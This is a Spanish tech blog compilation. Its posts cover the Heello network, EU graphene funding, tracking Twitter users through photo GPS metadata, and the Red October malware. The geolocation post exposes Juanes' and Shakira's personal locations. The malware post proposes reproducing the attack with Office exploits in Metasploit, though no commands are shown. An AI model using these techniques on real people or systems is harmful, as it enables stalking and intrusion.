Ya tenemos una nueva red social: Heello, plataforma creada por Noah Everett, el mismo que hizo Twitpic, y que pretende hacerle competencia a Twitter, que ya tiene 500 millones de usuarios (aunque sólo 200 millones son activos).
Heello es parecido a Twitter, aunque en lugar de escribir 140 caracteres, tienes espacio para 200.
Según la empresa, Heello “es una red abierta en tiempo real que permite compartir con otros usuarios aquello que está pasando. Además sirve para colgar fotos, videos y compartir la ubicación a través de check ins”.
Otra diferencia con Twitter: para ver fotos y videos no tienes que darle click al link para que se te desplieguen.

heello2

En Heello los tuits se llaman “pings”, los retuits “echos” y los followers son “listeners”. Los temas importantes también se marcan con un signo de número (#) y para escribirle a alguien también lo haces con un arroba antes del nombre del usuario.
Así se ve el perfil de Noah Everett:

heello

Heello todavía está en versión Beta, así que por el momento no hay aplicación para teléfonos móviles o tabletas.


Mil Millones De Euros Para Investigar El Grafeno


 
Circuitos flexibles hechos con grafeno.

Los proyectos para el grafeno y para el cerebro humano recibirán cada uno mil millones de euros, el premio más importante de la historia en el campo de la investigación, según el comunicado oficial de la Comisión Europea.

La Comisión Europea ha proclamado hoy lunes los ganadores de un concurso europeo de Tecnologías Futuras y Emergentes (FET), dotado de varios miles de millones de euros. Las iniciativas ganadoras, Grafeno y el proyecto Cerebro humano, recibirán cada una mil millones de euros para realizar durante diez años investigaciones de primer rango mundial en ámbitos donde se cruzan la ciencia y la tecnología. En cada iniciativa participan al menos quince Estados miembros de la UE y casi doscientos institutos de investigación.

El proyecto Grafeno investigará y explotará las propiedades únicas de un material revolucionario basado en el carbono. El grafeno es una extraordinaria combinación de propiedades físicas y químicas: es el material más fino, conduce la electricidad mucho mejor que el cobre, es entre cien y trescientas veces más fuerte que el acero y tiene propiedades ópticas únicas. En 2004, científicos europeos hicieron posible la utilización del grafeno y la sustancia está llamada a convertirse en el material prodigioso del siglo XXI (como lo fueron los plásticos en el siglo XX), sustituyendo en particular al silicio en los productos de TIC.

El proyecto Cerebro Humano creará la instalación experimental más grande del mundo para elaborar el modelo más detallado del cerebro a fin de estudiar cómo funciona el cerebro humano y, en último término, desarrollar un tratamiento personalizado de las enfermedades neurológicas y afines. Esta investigación sienta las bases científicas y técnicas de un progreso médico que podría cambiar radicalmente la calidad de vida de millones de europeos, y cuenta con la participación del Centro Nacional de Supercomputación (BSC-CNS), en Barcelona, ya que los cálculos a nivel neuronal se realizarán en el mare Nostrum y los investigadores del centro colaborarán en el desarrollo de modelos de programación. Los investigadores del BSC-CNS que participarán en este proyecto son el director del Departamento de Ciencias de la Computación, Jesús Labarta (investigador principal); el director del departamento de Operaciones y responsable del MareNostrum, Sergi Girona, además de Rosa Maria Badia, Álex Ramírez y Javier Bartolomé.

La Comisión Europea apoyará Grafeno y el proyecto Cerebro Humano como iniciativas emblemáticas de FET durante diez años a través de sus programas de financiación de la investigación y la innovación. La financiación continua para toda la duración del proyecto procederá de los programas marco de investigación de la UE, principalmente del programa Horizonte 2000 (2014-2020), que se está negociando actualmente en el Parlamento Europeo y el Consejo.

"La posición de Europa como superpotencia del conocimiento depende de su capacidad para concebir lo inconcebible y explotar las mejores ideas", ha declarado Neelie Kroes, vicepresidenta de la Comisión Europea. "Este concurso, dotado de varios miles de millones de euros, premia los avances científicos europeos y muestra que, cuando somos ambiciosos, podemos realizar en Europa la mejor investigación. Para que Europa siga siendo competitiva y lugar de acogida de la excelencia científica, en las próximas semanas los Gobiernos de la UE deben aprobar un presupuesto ambicioso para el programa Horizonte 2020".

El proyecto Grafeno está dirigido por el profesor Jari Kinaret, de la Universidad de Chalmers, en Suecia. En esta iniciativa emblemática participan cien grupos de investigación con 136 investigadores principales, entre ellos cuatro premios Nobel. En el proyecto Cerebro Humano, científicos de 87 instituciones participan en el proyecto, que está dirigido por el profesor Henry Markram de la École Polytechnique Fédérale de Lausana.

La colaboración marcará el futuro de la informática y la ciencia. El programa de iniciativas emblemáticas FET constituye un esfuerzo pionero a nivel mundial en este sentido. El concurso de iniciativas emblemáticas ha fomentado la colaboración en una nueva escala y con una nueva duración. En lugar de los ciclos habituales de financiación de dos a cuatro años, los diez años de duración y el enorme incentivo financiero han aumentado mucho el nivel científico de las propuestas de proyectos, lo que aportará a Europa mayores beneficios a largo plazo, en particular nuevas tecnologías y una innovación más rápida, según reza la comunicación de la CE.

Horizonte 2020 es el nuevo Programa de Investigación e Innovación de la UE, presentado por la Comisión como parte de la propuesta de presupuesto de la UE para 2014-2020. A fin de impulsar la investigación y la innovación como motores de crecimiento y empleo, la Comisión ha propuesto un presupuesto ambicioso de 80.000 millones euros a lo largo de siete años, incluido el propio programa de iniciativas emblemáticas FET.

Fuente


Y si quieren leer una nota adjunta aun más interesante:

Grafeno: El material que no podía existir

Fuente

sábado, 26 de enero de 2013

Cómo localizar usuarios de twitter y flickr a través de sus fotos

Existe una herramienta que permite descargar las publicadas en por un usuario automáticamente y que también podría ayudar en esta tarea, se llama Twitter Image Downloader, esta escrita en .net y es de código abierto, esta herramienta nos facilita la vida al bajar las imágenes publicadas en los últimos 150 tweets de una cuenta (por limitaciones de la api en twitter) para luego extraer sus meta datos y conseguir información que nos ayude a localizar el usuario de twitter en un momento determinado.


Ya que algunos han experimentado problemas a la hora de usar cree.py, aquí otra alternativa que junto a un visor EXIF como Exif ViewerJeffrey’s Exif viewer o la misma FOCA, te ayudará en la extracción de información  sobre las fotos publicadas por un usuario en twitter, con el añadido de ser open source y poder modificar la herramienta para que adaptarla a nuestras necesidades especificas.

ACTUALIZADO 4 de Diciembre de 2011: Este articulo escrito hace unos menes fue citado por la W Radio en Colombia, además del periódico El Diario y Opinion de Bolivia, por tanto lo dejo de nuevo en portada para facilitar su búsqueda a los posibles lectores de esos medios.

La geolocalización esta en auge, todos quieren saber donde están sus amigos y gustosos dan su información en sitios como Foursquare, DiOui o Facebook Places para no estar fuera de la “moda”, pero… ¿sabes quien ve realmente esta información?, muchas veces quienes publican estos datos en la red, no son conscientes de las consecuencias que esto puede acarrear.

Geolocalizacion Cómo localizar usuarios de twitter y flickr a través de sus fotos

Secuestradores, Violadores, Ladrones y demás delincuentes ya hacen uso de las nuevas tecnologías y la información que publicas en internet, para llevar a cabo sus delitos, como en el famoso caso de Lisa Montgomery; por eso debes ser consciente que la información que publicas en la red la puede ver CUALQUIER PERSONA y te recomendamos seguir los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red.

Esta información es especialmente sensible cuando quien la publica, no es consciente que lo está haciendo, como es el caso de las fotos en cuyo interior (sus metadatos) se encuentra almacenada la ubicación de donde fue tomada, una característica adoptada cada vez en mas cámaras, especialmente las integradas a teléfonos celulares inteligentes.

Gracias a El Maligno, me entero que Yiannis Kakavas ha desarrollado una herramienta llamada Cree.py, que automatiza el proceso de extracción y localización de la información GPS publicada en las fotos por un usuario de Twitter o , dejándola a la mano de cualquier persona.
La herramienta programada en Python y de código abierto, es muy fácil de utilizar, cuenta con versiones para Windows, GNU Linux y si resolvemos unas cuentas dependencias, podemos hacerla correr en Mac OS X.

Para este articulo analizaremos 2 de los famosos colombianos, que mas publican fotografías por Twitter…. @juanes y @Shakira

Juanes GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Lo primero que hacemos es abrir la herramienta, escribir la cuenta de Twitter o Flickr que queremos analizar (podemos usar un buscador también) y después presionar “Geolocate Targe”, esperamos unos minutos mientras se procesa la información…. obteniendo un mapa como el siguiente, donde podemos ver los puntos geolocalizados de las fotos obtenidas desde el perfil publico de @juanes

Juanes GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Para confirmar la información almacenada analizaremos las fotos descargadas por el Cree.py, con la FOCA, herramienta que permite analizar metadatos a imágenes y documentos.

Juanes GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Fotos bastante personales de @Juanes con su esposa Karen Martínez mientras estaban de viaje por Londres.

Juanes GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos

La ubicación de la oficina donde posiblemente produzcan los discos del artista

Juanes GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Haciendo arreglos a las canciones o las pistas…

Juanes GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Fotos del parque que se observa claramente en Creppy

Juanes GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Segunda foto del Hyde Park

Juanes GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Como podemos ver no es poca la información que cualquier persona puede obtener de la cuenta publica de Juanes, ¿los paparazzi sabrán de esto?, seguramente les sería de mucha utilidad….

Ahora pasamos a otra de nuestras celebridades… @shakira quien tampoco sabe que al publicar fotografías por Twitter, también esta publicando su ubicación, para ello seguimos el mismo procedimiento que con @juanes, buscamos su cuenta oficial, damos click en el botón “Geolocate Target” y esperamos que Cree.py haga su trabajo…

Shakira GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Después de esperar un poco, podemos ver algunas locaciones como el Coca Cola Park en South Africa.

Shakira GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Algunas direcciones en New York…

Shakira GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Y para corroborar el trabajo de cree.py de nuevo pasamos la FOCA a todas las fotos, logrando reconocer algunas de ellas.

Shakira GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Shakira con su novio de turno…

Shakira GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Foto del escenario antes de la presentación…

Shakira GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Ubicación de su camerino… ya sabes por si quieres darle un saludo…

Shakira GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos

En un late night show…

Shakira GPS8 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Algunos apuntes poco interesantes… ¿o no?

Shakira GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos

Detrás del telón…

Shakira GPS10 Cómo localizar usuarios de twitter y flickr a través de sus fotos

En el escenario..

Como pueden ver obtener la ubicación de los famosos no es nada complicado, pero es igual de fácil obtener la tuya; Por eso es tan importante que sigas los consejos que constantemente ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red y seas mas cuidadoso con tu información.

Mas Información:

Pagina oficial del Proyecto Cree.py

viernes, 25 de enero de 2013

"OP Octubre Rojo"... tomando el control mediante archivos adjuntos

El malware fue distribuido por más de medio mundo
Hace poco, Kaspersky publicó el descubrimiento de un malware dirigido a las "altas esferas" que pasó desapercibido durante mucho tiempo y parece haber sido programado por especialistas con intereses muy concretos. Surge la inmediata comparación con Flame, aunque todo apunta a que no llega a ese nivel de sofisticación. Su trama se ha llamado "Operación Octubre Rojo". 

Tras ojear la noticia me he puesto manos a la obra y hemos investigado un poco más sobre el alcance de este malware y su método de infección, el cual parece bastante eficaz. Según el mapa publicado por Kaspersky, buena parte de Europa, Asia e incluso África se ha visto afectada...


El método de infección:

Ejemplo de correo distribuyendo el malware

Esta es la parte más "curiosa". El principal método de infección es la distribución de ficheros adjuntos por email aprovechando vulnerabilidades en Office CVE-2009-3129 (Excel), CVE-2010-3333 y CVE-2012-0158 (ambas de Word). 

Vamos hacer un parón en este punto pues esta bien saber hacer de todo y si ha sido simple pero eficaz para "Operación Octubre Rojo" quien sabe algún día nos puede ser de utilidad a nosotros ;D


Los atacantes tomaron unos documentos previamente creados por una campaña de infección china, modificaron el payload y los enviaron a sus 

víctimas. El texto de los documentos no fue personalizado. Sin embargo, 
los diplomáticos, embajadores y víctima en general quedaron infectados.

Veamos como podemos aprovechar estos exploits en casa y sin sudar demasiado... imitando así el método de infección ..



CVE-2012-0158


Ya se hablo algo de ella en Hackplayers.

Todo empieza cuando el Word abre el documento previamente mandado por email... La vulnerabilidad CVE-2012-0158 es explotada y el shellcode del archivo se desencadena.

Este shellcode es responsable de instalar o ejecutar un payload en el sistema operativo.


En esta etapa, el mismo shellcode inicia un nuevo proceso en Word y abre el documento - trampa, que también se coloca en el directorio Temp. El primer proceso se finaliza y la víctima sigue viendo sólo el documento aparentemente legítimo.


Vamos a la práctica:

 


El siguiente paso es fácil de adivinar... e indicaremos en Metasploit las opciones como mejor nos convenga, Para según que casos en el ejemplo usaré las siguientes (en principio iba a omitir este paso, pero por si llega algún recién nacido lo explicamos bien desmenuzadito):



Para usar las otras dos vulnerabilidades más de lo mismo...


CVE-2010-3333


Cito a Inteco: "Desbordamiento de búfer basado en pila en Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 y 2008 para Mac, Office para Mac 2011 y Open XML File Format Converter para Mac permite a atacantes remotos ejecutar código de su elección mediante datos RTF manipulados, también conocido como "RTF Stack Buffer Overflow Vulnerability."


Para los que quieran profundidar a nivel más bajo en el por qué de este fallo de Microsoft Word, encontré un artículo muy bueno en el blog Unlearning security  el cual recomiendo que revises porque explicarlo de nuevo aquí sería una pérdida de tiempo..

De nuevo Inteco: "Microsoft Office Excel v2002 SP3, v2003 SP3, y 2007 SP1 y SP2; Office v2004 y v2008 para Mac; Open XML File Format Converter para Macato ; Office Excel Viewer v2003 SP3; Office Excel Viewer SP1 y SP2; y Office Compatibility Pack para Word, Excel, y PowerPoint v2007 File Formats SP1 y SP2 no analiza adecuadamente el formato del fichero Excel, lo que permite a atacantes remotos ejecutar código de su elección a través de una hoja de cálculo con un registro de objeto manipulada, como "vulnerabilidad de corrupción de memoria en el registro Featheader de Excel"."


La manera de actuar para llevar a cabo el ataque es muy similar en los tres casos. Pero para que quede cristalino les adjunto un vídeo: